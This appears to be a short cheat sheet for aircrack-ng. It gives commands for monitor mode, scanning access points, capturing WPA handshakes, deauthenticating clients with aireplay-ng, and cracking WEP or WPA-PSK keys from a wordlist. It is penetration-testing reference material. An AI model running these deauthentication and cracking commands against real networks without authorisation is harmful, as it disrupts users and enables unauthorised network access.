AIRCRACK-NG

https://github.com/aircrack-ng/aircrack-ng

Monitor Mode

airmon-ng check kill
Kill processes that interfere with monitor mode.

airmon-ng start wlan0
Start monitor mode on wlan0 interface.

Capture

airodump-ng wlan0mon
Listen for APs around.

airodump-ng wlan0mon -w scan
Identify target BSSID and Channel.

airodump-ng wlan0mon -w capture --bssid AP:MAC --channel 6
Capture traffic from an AP. Need to wait for WPA handshake in the top right.
Can use Deauth Attack to speed up the process.

Deauth Attack

aireplay-ng wlan0mon -0 1 -a AP:MAC -c CLIENT:MAC
Deauth attack (kick the client off the AP really quick).

-0 1
Deauth, one time.
-c
Client to deauthenticate.

Crack WEP, WPA-PSK

aircrack-ng -a WEP myCapture.cap
aircrack-ng -w wordlist.txt -b AP:MAC myCaptureFromAirodump

-a WEP
Attack Mode: WEP (Need > 5000 IV) or WPA-PSK.
-e mySSID
Specifies SSID.
-n 64
Size of the key (64, 128, 152, 256, 512).

Monitor Mode#

Capture#

Deauth Attack#

Crack WEP, WPA-PSK#

Monitor Mode

Capture

Deauth Attack

Crack WEP, WPA-PSK